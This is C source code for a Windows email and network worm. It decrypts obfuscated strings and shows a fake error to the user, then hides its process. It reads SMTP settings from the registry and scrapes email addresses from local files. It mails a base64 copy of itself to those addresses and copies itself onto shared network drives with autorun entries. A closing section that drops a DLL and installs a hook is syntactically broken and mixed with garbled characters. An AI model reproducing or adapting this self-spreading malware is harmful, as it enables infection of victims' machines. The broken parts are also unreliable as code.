void WINAPI worm()
long w0rm_ThreadCodeList[ 3] = {
( long) L0calThread,
( long) Rem0teThread,
( long) MailThread
} ;
char *StrArray[ 66] = {
szCopyRight,
szFakeMsg,
szSetUp,
szWNetOpenEnumA,
szWNetCloseEnum,
szWNetEnumResourceA,
szMPR_DLL,
szWINSOCK_DLL,
szWSAStartup,
szinet_addr,
szgethostbyaddr,
szgethostbyname,
szhtons,
szsocket,
szconnect,
szsend,
szrecv,
szclosesocket,
szWSACleanup,
smtp_str00,
smtp_str01,
smtp_str02,
smtp_str03,
smtp_str06,
smtp_str07,
smtp_str08,
smtp_str09,
smtp_str0B,
smtp_str0C,
smtp_str0D,
smtp_str0E,
smtp_str0F,
smtp_newline,
smtp_separator,
szWindir00,
szWindir01,
szWindir02,
szWindir03,
szWindir04,
szWIN_INI,
szSETUP_EXE,
szSYSTEM_EXE,
szADVAPI_DLL,
szRegOpenKeyExA,
szRegQueryValueExA,
szRegCloseKey,
szAccountManager,
szDefaultMail,
szAccounts,
szSMTPserver,
szSMTPemail,
szExt00,
szExt01,
szExt02,
szExt03,
szExt04,
szExt05,
szExt06,
szOutlook,
szCuteFtp,
szInternetExplorer,
szTelnet,
szMirc,
szRegisterServiceProcess,
szKernel32,
szTempFile
} ;
static HANDLE w0rm_hThreadList[ 3] ;
DWORD w0rm_ThreadIDList[ 3] ;
char szModule[ MAX_PATH] ;
char *Param ;
int count ;
int min_threads ;
int max_threads ;
BOOL re_generation ;
MailDone = FALSE ;
for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;
GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
Param = szModule ;
while( *Param != 0) Param++ ;
Param -= 5 ;
if (( *Param == 'P') || ( *Param == 'p'))
{
MessageBox( NULL,
szFakeMsg,
szSetUp,
MB_OK | MB_ICONSTOP) ;
re_generation = FALSE ;
max_threads = 1 ;
}
else
{
if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
{
if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
{
a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
}
}
re_generation = TRUE ;
max_threads = 3 ;
}
min_threads = 0 ;
do
{
for ( count = min_threads ; count < max_threads ; count++ )
{
w0rm_hThreadList[ count] = CreateThread( NULL,
0,
( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
NULL,
0,
&w0rm_ThreadIDList[ count]) ;
}
for ( count = min_threads ; count < max_threads ; count++ )
{
if ( w0rm_hThreadList[ count] != NULL)
{
WaitForSingleObject( w0rm_hThreadList[ count], INFINITE) ;
CloseHandle ( w0rm_hThreadList[ count]) ;
}
}
if ( MailDone)
{
GetWindowsDirectoryA( szModule, MAX_PATH) ;
strcat( szModule, szWIN_INI) ;
WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
re_generation = FALSE ;
}
min_threads = 1 ;
if ( re_generation) Sleep( 0x000FFFFF) ;
} while( re_generation) ;
return 0 ;
}
long WINAPI MailThread(long lParam)
{
unsigned int addr ;
struct sockaddr_in server ;
struct hostent *hp ;
WSADATA wsaData ;
HANDLE hFile ;
HANDLE hMap ;
char enc0de_filename[ MAX_PATH] ;
char ShortBuff[ 512] ;
char szSIGN[ 512] ;
char szHELO[ 512] ;
BOOL Success ;
void *lpFile ;
int StrCount ;
int FileSize ;
typedef struct
{
char *Command ;
BOOL WaitReply ;
}
SMTPstr ;
SMTPstr SMTPstrings00[ 2] = { szHELO, TRUE ,
szMAIL_FROM, TRUE } ;
SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE ,
szMAIL_FROM+5, FALSE ,
smtp_str06, FALSE ,
smtp_str07, FALSE ,
smtp_separator, FALSE ,
smtp_str08, FALSE ,
smtp_separator, FALSE ,
smtp_str09, FALSE ,
szSIGN, FALSE ,
smtp_separator, FALSE ,
smtp_str0B, FALSE } ;
SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
smtp_separator, FALSE ,
smtp_str0D, FALSE ,
smtp_newline, FALSE ,
smtp_str0E, TRUE,
smtp_str0F, FALSE } ;
WaitC0nnected() ;
if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;
sprintf( szHELO, "%s %s\n", smtp_str00, szSMTPname) ;
sprintf( szMAIL_FROM, "%s <%s>\n", smtp_str01, szSMTPaddr) ;
sprintf( szSIGN,"\n:)\n\n----\n%s\n\n--", szSMTPaddr) ;
if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;
a_WSAStartup = ( FARPROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
a_inet_addr = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
a_gethostbyaddr = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
a_gethostbyname = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
a_htons = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
a_socket = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
a_connect = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
a_send = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
a_recv = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
a_closesocket = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
a_WSACleanup = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;
if ( ( a_WSAStartup == NULL) ||
( a_inet_addr == NULL) ||
( a_gethostbyaddr == NULL) ||
( a_gethostbyname == NULL) ||
( a_htons == NULL) ||
( a_socket == NULL) ||
( a_connect == NULL) ||
( a_send == NULL) ||
( a_recv == NULL) ||
( a_closesocket == NULL) ||
( a_WSACleanup == NULL))
{
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
{
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( isalpha( ( int) szSMTPserver[ 0]))
{
hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
}
else
{
addr = a_inet_addr( szSMTPname) ;
hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
}
if ( hp == NULL)
{
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
memset( &server, 0, sizeof( server)) ;
memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
server.sin_family = hp->h_addrtype ;
server.sin_port = a_htons( 25) ;
conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;
if ( conn_socket < 0 )
{
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
{
a_closesocket( conn_socket) ;
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
}
a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;
for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
{
Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
if ( !Success) break ;
}
if ( Success)
{
Found = 0 ;
GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
enc0de_filename[ 3] = 0 ;
FindPe0ple( enc0de_filename) ;
for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
{
Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
if ( !Success) break ;
}
if ( Success)
{
GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
GetTempPathA( MAX_PATH, enc0de_filename) ;
strcat( enc0de_filename, szTempFile) ;
if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
{
if ( ( hFile = CreateFileA( enc0de_filename,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)) != INVALID_HANDLE_VALUE)
{
FileSize = GetFileSize( hFile, NULL) ;
if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
{
if ( ( hMap = CreateFileMappingA( hFile,
NULL,
PAGE_READONLY | PAGE_WRITECOPY,
0,
FileSize,
NULL)) != NULL)
{
if ( ( lpFile = MapViewOfFile( hMap,
FILE_MAP_READ,
0,
0,
FileSize)) != NULL)
{
base64_encode( lpFile, FileSize) ;
for ( StrCount = 0 ; StrCount < 6 ; StrCount++ )
{
if ( ( Success = str2socket( SMTPstrings02[ StrCount].Command,
SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
}
if ( Success) MailDone = TRUE ;
UnmapViewOfFile( lpFile) ;
}
CloseHandle( hMap) ;
}
}
CloseHandle( hFile) ;
}
DeleteFileA( enc0de_filename) ;
}
}
}
a_closesocket( conn_socket) ;
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
//··············································································?
void NetW0rming( LPNETRESOURCE lpnr)
{
LPNETRESOURCE lpnrLocal ;
HANDLE hEnum ;
int count ;
int cEntries = 0xFFFFFFFF ;
DWORD dwResult ;
DWORD cbBuffer = 32768 ;
if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
RESOURCETYPE_ANY,
0,
lpnr,
&hEnum) != NO_ERROR) return ;
do
{
lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;
dwResult = a_WNetEnumResource( hEnum,
&cEntries,
lpnrLocal,
&cbBuffer) ;
if ( dwResult == NO_ERROR)
{
for ( count = 1 ; count < cEntries ; count++ )
{
if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
{
NetW0rming( &lpnrLocal[ count]) ;
}
else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
{
Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
}
}
}
else if (dwResult != ERROR_NO_MORE_ITEMS) break ;
} while ( dwResult != ERROR_NO_MORE_ITEMS) ;
GlobalFree ( ( HGLOBAL) lpnrLocal) ;
a_WNetCloseEnum( hEnum) ;
return ;
}
//··············································································?
void Rem0teInfecti0n( char *szPath)
{
char *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
WIN32_FIND_DATAA FindData ;
HANDLE hFind ;
char szLookUp[ MAX_PATH] ;
char w0rm0rg[ MAX_PATH] ;
char w0rmD3st[ MAX_PATH] ;
int aux ;
for ( aux = 0 ; aux < 5 ; aux++ )
{
sprintf ( szLookUp, "%s\\%s%s", szPath, dir_name[ aux], szWIN_INI) ;
if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
{
sprintf( w0rmD3st, "%s\\%s\\%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;
if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
{
if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
{
WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
FindClose ( hFind) ;
break ;
}
}
FindClose ( hFind) ;
}
}
}
//··············································································?
BOOL str2socket( char *msg, BOOL do_recv)
{
int retval ;
char Buffer[ 256];
/* Code used to debug the worm
if ( do_recv)
{
if ( MessageBox( NULL,
msg,
"send() this string ?",
MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
}
*/
if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
{
a_WSACleanup() ;
return FALSE ;
}
if ( do_recv)
{
retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
if ( ( retval == SOCKET_ERROR) || ( retval == 0))
{
a_closesocket( conn_socket) ;
a_WSACleanup() ;
return FALSE ;
}
Buffer[ retval] = 0 ;
/* Code used to debug the worm
MessageBox( NULL,
Buffer,
"recv()",
MB_OK | MB_ICONSTOP) ;
*/
}
return TRUE ;
}
//··············································································?
BOOL GetSMTP( char *dest, char *org_email)
{
char szKeyName[ MAX_PATH] ;
char szRes[ MAX_PATH] ;
char *move2low ;
int size ;
HKEY hKey ;
if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;
a_RegOpenKeyExA = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
a_RegCloseKey = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;
if ( ( a_RegOpenKeyExA == NULL) ||
( a_RegQueryValueExA == NULL) ||
( a_RegCloseKey == NULL))
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
strcpy( szKeyName, szAccountManager) ;
if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
szKeyName,
0,
KEY_QUERY_VALUE,
&hKey) != ERROR_SUCCESS)
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szDefaultMail,
0,
NULL,
szRes,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
a_RegCloseKey( hKey) ;
strcat( szKeyName, szAccounts) ;
strcat( szKeyName, szRes) ;
if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
szKeyName,
0,
KEY_QUERY_VALUE,
&hKey) != ERROR_SUCCESS)
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szSMTPserver,
0,
NULL,
dest,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szSMTPemail,
0,
NULL,
org_email,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
a_RegCloseKey( hKey) ;
move2low = org_email ;
while( *move2low != 0)
{
if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
move2low++ ;
}
FreeLibrary( hADVAPI) ;
return TRUE ;
}
//··············································································?
void base64_encode(const void *buf, int size)
{
char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;
char ok_base64[ 80] ;
char *p = ok_base64 ;
unsigned char *q = ( unsigned char *) buf ;
int i ;
int c ;
int l ;
BOOL SendRes ;
i = l = 0 ;
while( i < size)
{
c = q[ i++] ;
c *= 256 ;
if( i < size) c += q[ i] ;
i++ ;
c *= 256 ;
if( i < size) c += q[ i] ;
i++ ;
p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;
if( i > size) p[ 3] = '=' ;
if( i > size + 1) p[ 2] = '=' ;
p += 4 ;
l += 1 ;
if ( l == 0x013)
{
ok_base64[ 0x04C] = 0x0A ;
ok_base64[ 0x04D] = 0 ;
if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;
p = ok_base64 ;
l = 0;
}
}
if ( SendRes != FALSE)
{
if ( l != 0)
{
ok_base64[ l*4] = 0x0A ;
ok_base64[ l*4] = 0 ;
str2socket( ok_base64, FALSE) ;
}
}
}
//··············································································?
char *DecryptStr( char *DcrStr)
{
char *pos = DcrStr ;
while( *pos != 0)
{
*pos ^= ( char) 0x0FF ;
pos++ ;
}
return DcrStr ;
}
//··············································································?
void FindPe0ple( char *szPath)
{
char szRecursive[ MAX_PATH] ;
char szCurrentDir[ MAX_PATH] ;
char FileExt[ MAX_PATH] ;
char RCPT_TO[ MAX_PATH] ;
WIN32_FIND_DATAA FindData ;
HANDLE hFind ;
HANDLE hFile ;
HANDLE hMap ;
void *lpFile ;
char *lpc01 ;
char *lpc02 ;
char *lpc03 ;
char *lpc04 ;
char auxchar ;
int l00king ;
int addrssize ;
GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;
if ( SetCurrentDirectoryA( szPath) == FALSE) return ;
hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
if ( hFind != INVALID_HANDLE_VALUE)
{
do
{
if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.'))
{
strcpy (szRecursive,szPath) ;
strcat (szRecursive,FindData.cFileName) ;
strcat (szRecursive,"\\") ;
FindPe0ple( szRecursive) ;
}
else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.')))
{
lpc01 = FindData.cFileName ;
lpc02 = NULL ;
while ( *lpc01 != 0)
{
if ( *lpc01 == 46) lpc02 = lpc01 ;
lpc01++ ;
}
lpc01 = FileExt ;
if ( lpc02 != NULL)
{
while ( *lpc02 != 0)
{
if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
else *lpc01 = *lpc02 ;
lpc01++ ;
lpc02++ ;
}
FileExt[ 4] = 0 ;
if ( ( strcmp( FileExt, szExt00) == 0) ||
( strcmp( FileExt, szExt01) == 0) ||
( strcmp( FileExt, szExt02) == 0) ||
( strcmp( FileExt, szExt03) == 0) ||
( strcmp( FileExt, szExt04) == 0) ||
( strcmp( FileExt, szExt05) == 0) ||
( strcmp( FileExt, szExt06) == 0))
{
if ( ( hFile = CreateFileA( FindData.cFileName,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)) != INVALID_HANDLE_VALUE)
{
if ( ( hMap = CreateFileMappingA( hFile,
NULL,
PAGE_READONLY,
0,
FindData.nFileSizeLow,
NULL)) != NULL)
{
if ( ( lpFile = MapViewOfFile( hMap,
FILE_MAP_READ,
0,
0,
FindData.nFileSizeLow)) != NULL)
{
lpc01 = lpFile ;
addrssize = FindData.nFileSizeLow ;
l00king = 0 ;
while( ( addrssize > 16) && ( Found < 16))
{
if ( *lpc01 == 60)
{
l00king = 1 ;
lpc02 = lpc01 ;
}
if ( ( *lpc01 == 64) && ( l00king == 1))
{
l00king = 2 ;
}
if ( ( *lpc01 == 62) && ( l00king == 2))
{
lpc03 = szSMTPaddr ;
lpc04 = lpc02 + 1 ;
while ( *lpc03 != 0)
{
auxchar = *lpc04 ;
if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;
if ( *lpc03 != auxchar)
{
l00king = 0 ;
break ;
}
lpc03++ ;
lpc04++ ;
}
if ( l00king == 0)
{
strcpy( RCPT_TO, smtp_str02) ;
lpc03 = RCPT_TO + 9 ;
while ( *lpc02 != 62)
{
*lpc03 = *lpc02 ;
lpc02++ ;
lpc03++ ;
}
*lpc03 = 62 ;
lpc03++ ;
*lpc03 = 0 ;
strcat( RCPT_TO, "\n") ;
str2socket( RCPT_TO, TRUE) ;
Found++ ;
}
else l00king = 0 ;
}
if ( ( *lpc01 < 64) &&
( *lpc01 != 46) &&
( *lpc01 != 60) &&
( *lpc01 != 62))
{
l00king = 0 ;
}
if ( *lpc01 > 122)
{
l00king = 0 ;
}
lpc01++ ;
addrssize-- ;
}
UnmapViewOfFile( lpFile) ;
}
CloseHandle( hMap) ;
}
CloseHandle( hFile) ;
}
}
}
}
}
while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;
FindClose( hFind) ;
}
return ;
}
//··············································································?
void WaitC0nnected( void)
{
InetActivated = FALSE ;
while ( !InetActivated)
{
EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;
Sleep( 0x01770) ;
}
return ;
}
//··············································································?
BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{
int CaptionLen ;
int AwareLen ;
int CompareLen ;
int InetAware ;
int EquChar ;
int aux0 ;
int aux1 ;
char *Foll0w ;
char *PtrAware ;
char WindowCaption[ 1024] ;
CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;
if ( CaptionLen > 0)
{
Foll0w = WindowCaption ;
while( *Foll0w != 0)
{
if ( ( *Foll0w >= 'a') && ( *Foll0w <= 'z')) *Foll0w = *Foll0w - 'a' + 'A' ;
Foll0w++ ;
}
for( InetAware = 0 ; InetAware < 5 ; InetAware++)
{
AwareLen = strlen( szAware[ InetAware]) ;
if ( AwareLen < CaptionLen)
{
CompareLen = CaptionLen - AwareLen ;
for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
{
EquChar = 0 ;
Foll0w = &WindowCaption[ aux0] ;
PtrAware = szAware[ InetAware] ;
for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
{
if ( *Foll0w == *PtrAware) EquChar++ ;
}
if ( EquChar == AwareLen)
{
InetActivated = TRUE ;
break ;
}
aux0++ ;
}
}
}
}
return ( !InetActivated) ;
}
void TFTP32()
{
HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
//printf("\nCreate file %s failed:%d",RemoteFilePath,GetLastError());
return -1
}
//дÎļþÄÚÈÝ
DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
while(dwSize>dwIndex)
{
if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
{
//printf("\nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
return -1
}
dwIndex+=dwWrite;
}
//¹Ø±ÕÎļþ¾ä±ú
CloseHandle(hFile);
hhook hk
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
si.hStdError = si.hStdOutput = wp1;
si.hStdInput = rp2;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
//this two must not exchange
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)
Hookproc hkprc
static HINSTANCE hinstDLL
hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}
±¾ÎĵØÖ·£ºhttp://com.8s8s.com/it/it2753.htm